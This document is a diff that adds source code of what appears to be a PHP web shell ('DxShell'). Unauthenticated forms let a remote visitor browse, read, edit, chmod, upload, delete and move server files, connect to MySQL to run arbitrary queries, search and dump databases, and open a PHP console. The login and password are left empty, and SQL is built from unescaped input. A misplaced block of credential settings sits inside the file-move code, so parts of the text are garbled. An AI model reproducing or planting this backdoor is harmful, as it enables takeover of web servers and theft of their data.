+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+             $GLOB['SHELL']['USER']['Login']='';
+             $GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
